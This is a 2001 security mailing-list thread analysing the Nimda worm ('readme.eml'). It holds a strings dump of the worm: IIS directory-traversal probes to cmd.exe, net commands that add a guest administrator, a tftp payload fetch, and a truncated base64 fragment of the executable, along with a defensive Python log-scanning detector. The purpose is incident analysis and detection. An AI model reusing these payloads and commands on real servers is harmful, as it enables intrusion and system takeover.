Re: New worm? 'readme.eml'

From: Billy Smith (bsmithat_private)
Date: Tue Sep 18 2001 - 09:16:15 PDT


    I thought you all might be interested in a strings listing of the 
    readme.exe found in readme.eml.  Here are some details (I deleted the 
    noise):
    
    
    System\CurrentControlSet\Services\VxD\MSTCP
    NameServer
    SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
    SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
    Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
    MIME-Version: 1.0
    Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="====_ABC1234567890DEF_===="
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Unsent: 1
    --====_ABC1234567890DEF_====
    Content-Type: multipart/alternative;
    boundary="====_ABC0987654321DEF_===="
    --====_ABC0987654321DEF_====
    Content-Type: text/html;
    charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable
    --====_ABC0987654321DEF_====--
    --====_ABC1234567890DEF_====
    Content-Type: audio/x-wav;
    name="readme.exe"
    Content-Transfer-Encoding: base64
    Content-ID: <EA4DMGBP9p>
    --====_ABC1234567890DEF_====
    NUL=
    [rename]
    \wininit.ini
    Personal
    Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    \*.*
    EXPLORER
    fsdhqherwqi2001
    SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
    share c$=c:\
    user guest ""
    localgroup Administrators guest /add
    localgroup Guests guest /add
    user guest /active
    open
    user guest /add
    HideFileExt
    ShowSuperHidden
    Hidden
    Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
    \\%s
    
    /scripts
    /MSADC
    /scripts/..%255c..
    /_vti_bin/..%255c../..%255c../..%255c..
    /_mem_bin/..%255c../..%255c../..%255c..
    /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
    /scripts/..%c1%1c..
    /scripts/..%c0%2f..
    /scripts/..%c0%af..
    /scripts/..%c1%9c..
    /scripts/..%%35%63..
    /scripts/..%%35c..
    /scripts/..%25%35%63..
    /scripts/..%252f..
    /root.exe?/c+
    /winnt/system32/cmd.exe?/c+
    net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
    tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
    Admin.dll
    c:\Admin.dll
    d:\Admin.dll
    e:\Admin.dll
    /Admin.dll
    GET %s HTTP/1.0
    Host: www
    Connnection: close
    readme
    main
    index
    default
    html
    .asp
    .htm
    \readme.eml
    .exe
    winzip32.exe
    riched20.dll
    .nws
    .eml
    .doc
    .exe
    dontrunold
    
    SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan\
    SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
    SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
    Cache
    Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
    QUIT
    Subject:
    From: <
    DATA
    RCPT TO: <
    MAIL FROM: <
    HELO
    aabbcc
    -dontrunold
    NULL
    \readme*.exe
    admin.dll
    qusery9bnow
    -qusery9bnow
    \mmc.exe
    \riched20.dll
    boot
    Shell
    explorer.exe load.exe -dontrunold
    \system.ini
    \load.exe
    
    
    
    
    
    At 12:13 PM 9/18/2001 -0300, Pedro Miller Rabinovitch wrote:
    >Hi,
    >
    >   is this CodeBlue? Some new worm? Or just one I hadn't heard about? It 
    > uses double-encoding exploits, and propagates both by adding javascript 
    > to the main page and by probing other systems...
    >
    >Report:
    >
    >Our systems got hit by 3 attempts, all unsuccessful, to exploit IIS:
    >
    >Date    Time  D Source IP       Sport Dport   P
    >01Sep18 11:20 T 200.192.226.40   3933    80   T
    >01Sep18 11:20 T 200.192.226.40   3767    80   T
    >01Sep18 11:20 T 200.192.226.40   3572    80   T
    >
    >  SOURCE: 200.192.226.40
    >
    >  45 00 00 9d 62 61 40 00 77 06 16 3d c8 c0 e2 28 xx xx xx xx E...ba@.w..=...(xxxx
    >  0d f4 00 50 7b b0 1f 02 c3 7e 8c 4e 50 18 22 38 07 7a 00 00 ...P{....~.NP."8.z..
    >  47 45 54 20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET /_vti_bin/..%255
    >  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 c../..%255c../..%255
    >  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 c../winnt/system32/c
    >  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 md.exe?/c+dir HTTP/1
    >  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e .0..Host: www..Connn
    >  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: close....
    >
    >  45 00 00 9d b0 63 40 00 77 06 c8 3a c8 c0 e2 28 xx xx xx xx E....c@.w..:...(xxxx
    >  0e b7 00 50 7b b2 1a 91 c3 4f d5 1e 50 18 22 38 c7 93 00 00 ...P{....O..P."8....
    >  47 45 54 20 2f 5f 6d 65 6d 5f 62 69 6e 2f 2e 2e 25 32 35 35 GET /_mem_bin/..%255
    >  63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 c../..%255c../..%255
    >  63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 73 74 65 6d 33 32 2f 63 c../winnt/system32/c
    >  6d 64 2e 65 78 65 3f 2f 63 2b 64 69 72 20 48 54 54 50 2f 31 md.exe?/c+dir HTTP/1
    >  2e 30 0d 0a 48 6f 73 74 3a 20 77 77 77 0d 0a 43 6f 6e 6e 6e .0..Host: www..Connn
    >  65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a          ection: close....
    >
    >  45 00 00 b9 39 65 40 00 77 06 3f 1d c8 c0 e2 28 xx xx xx xx E...9e@.w.?....(xxxx
    >  0f 5d 00 50 7b b2 22 36 c3 4c 5a ed 50 18 22 38 dd 36 00 00 .].P{."6.LZ.P."8.6..
    >  47 45 54 20 2f 6d 73 61 64 63 2f 2e 2e 25 32 35 35 63 2e 2e GET /msadc/..%255c..
    >  2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 35 35 63 2f 2e /..%255c../..%255c/.
    >  2e 25 63 31 25 31 63 2e 2e 2f 2e 2e 25 63 31 25 31 63 2e 2e .%c1%1c../..%c1%1c..
    >  2f 2e 2e 25 63 31 25 31 63 2e 2e 2f 77 69 6e 6e 74 2f 73 79 /..%c1%1c../winnt/sy
    >  73 74 65 6d 33 32 2f 63 6d 64 2e 65 78 65 3f 2f 63 2b 64 69 stem32/cmd.exe?/c+di
    >  72 20 48 54 54 50 2f 31 2e 30 0d 0a 48 6f 73 74 3a 20 77 77 r HTTP/1.0..Host: ww
    >  77 0d 0a 43 6f 6e 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 w..Connnection: clos
    >  65 0d 0a 0d 0a                                              e....
    >
    >---------------
    >
    >When I connected to the originating server (femm.tdkomm.com.br), I saw the 
    >normal web page for the institution, plus a pop-up window for 
    >http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as follows:
    >
    >
    >MIME-Version: 1.0
    >Content-Type: multipart/related;
    >type="multipart/alternative";
    >boundary="====_ABC1234567890DEF_===="
    >X-Priority: 3
    >X-MSMail-Priority: Normal
    >X-Unsent: 1
    >
    >--====_ABC1234567890DEF_====
    >Content-Type: multipart/alternative;
    >boundary="====_ABC0987654321DEF_===="
    >
    >--====_ABC0987654321DEF_====
    >Content-Type: text/html;
    >charset="iso-8859-1"
    >Content-Transfer-Encoding: quoted-printable
    >
    >
    >--====_ABC0987654321DEF_====--
    >
    >--====_ABC1234567890DEF_====
    >Content-Type: audio/x-wav;
    >name="readme.exe"
    >Content-Transfer-Encoding: base64
    >Content-ID: <EA4DMGBP9p>
    >
    >TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    >AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
    >ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO
    >PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UEUAAEwBBQB1Oqc7
    >AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEAAAABAAAAQAAAAA
    >... (worm code follows)
    >
    >I've inspected the executable code, and it reads like a worm. (doh)
    >
    >Has anyone seen this?
    >
    >Regards,
    >
    >         Pedro.
    >--
    >Pedro Miller Rabinovitch
    >Technology Manager
    >Cipher Technology
    >55-21-2579-3999
    >http://www.cipher.com.br
    >
    >-----------------------------------------------------------------
    >This list is provided by the SecurityFocus ARIS analyzer service.
    >For more information on this free incident handling, management
    >and tracking system please see: http://aris.securityfocus.com
    >
    
    
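The probe URIs in the strings listing and in the quoted packet dumps all depend on IIS decoding the request path a second time (the %255c / %%35%63 family) or mis-decoding an overlong UTF-8 byte pair (%c0%af, %c1%1c and friends) after it has already checked the path for "..". The Python below is an added example, not code from the original post or from either poster: it normalizes request URIs the way the vulnerable server effectively did, then flags any request that traverses out of the web root or reaches for cmd.exe / root.exe / Admin.dll. The W3C-style sample log lines, the field layout assumed for them, and the overlong-sequence table are constructed for this example; the URIs themselves are the ones that appear in the listing and the dumps.

```python
"""Flag IIS traversal probes (double-percent and overlong UTF-8 variants) in
W3C extended log lines.  Added example; sample data is constructed."""
import re
from typing import Optional
from urllib.parse import unquote_to_bytes

# Byte pairs that vulnerable IIS builds accepted as a path separator even
# though they are not valid UTF-8.  Table built from the encodings seen in
# the strings listing above (constructed for this example, not exhaustive).
OVERLONG_SEPARATORS = {
    b"\xc0\xaf": b"/",
    b"\xc0\x2f": b"/",
    b"\xc1\x9c": b"\\",
    b"\xc1\x1c": b"\\",
}

# Binaries the worm asks for once traversal works (from the listing).
TARGET_BINARIES = (b"cmd.exe", b"root.exe", b"admin.dll")

TRAVERSAL_RE = re.compile(rb"\.\.[\\/]")


def normalize_uri(uri: str, max_rounds: int = 3) -> bytes:
    """Percent-decode repeatedly so %255c, %%35%63 and %25%35%63 all collapse
    to a backslash, then fold overlong UTF-8 pairs to '/' or '\\'."""
    data = uri.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, sep in OVERLONG_SEPARATORS.items():
        data = data.replace(seq, sep)
    return data.lower()


def detect_encodings(uri: str) -> list:
    """Name the encoding tricks present in the raw (undecoded) URI."""
    tricks = []
    low = uri.lower()
    if "%25" in low or "%%" in low:
        tricks.append("double-percent")
    once = unquote_to_bytes(low.encode("latin-1", "replace"))
    if any(seq in once for seq in OVERLONG_SEPARATORS):
        tricks.append("overlong-utf8")
    return tricks


def classify_uri(uri: str) -> dict:
    """Indicators for one request URI (stem plus query)."""
    norm = normalize_uri(uri)
    return {
        "traversal": TRAVERSAL_RE.search(norm) is not None,
        "target": next((t.decode() for t in TARGET_BINARIES if t in norm), None),
        "tricks": detect_encodings(uri),
        "normalized": norm.decode("latin-1"),
    }


def parse_w3c_line(line: str) -> Optional[dict]:
    """Assumed field layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status."""
    if line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, method, stem, query, status = parts
    return {"ip": ip, "method": method, "stem": stem, "query": query, "status": status}


def scan_log(lines) -> list:
    """Return one finding per request that traverses or names a target binary."""
    findings = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        uri = rec["stem"] if rec["query"] == "-" else rec["stem"] + "?" + rec["query"]
        ind = classify_uri(uri)
        if ind["traversal"] or ind["target"]:
            findings.append({"ip": rec["ip"], "target": ind["target"],
                             "tricks": ind["tricks"], "normalized": ind["normalized"]})
    return findings


# Constructed sample log: the first four requests are the probe URIs from the
# listing and the packet dumps; the last two are ordinary traffic.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 11:20:01 200.192.226.40 GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 11:20:02 200.192.226.40 GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 11:20:03 200.192.226.40 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2001-09-18 11:20:04 200.192.226.40 GET /scripts/root.exe /c+dir 404
2001-09-18 11:21:00 10.0.0.7 GET /index.html - 200
2001-09-18 11:21:05 10.0.0.7 GET /scripts/report.asp id=5 200
""".splitlines()

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["target"], f["tricks"], f["normalized"])
```

A status of 404 does not mean the host is safe: an unpatched server answers these with 200 and the output of `dir`, so the useful signal is the normalized path, not the response code. Matching on the decoded form rather than on literal strings is what keeps the check from being bypassed by the next spelling of the same backslash.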
    



    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 11:50:13 PDT